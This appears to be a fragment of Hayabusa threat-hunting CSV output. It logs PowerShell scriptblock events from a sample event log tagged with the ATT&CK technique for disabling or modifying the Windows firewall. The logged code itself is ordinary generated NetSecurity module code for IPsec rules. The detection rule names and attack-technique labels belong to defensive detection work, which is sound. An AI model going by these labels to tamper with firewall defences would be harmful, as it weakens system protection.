[System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDi",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"isplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDi",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"splayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecMainModeRule' -Alias '*' function Disable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if 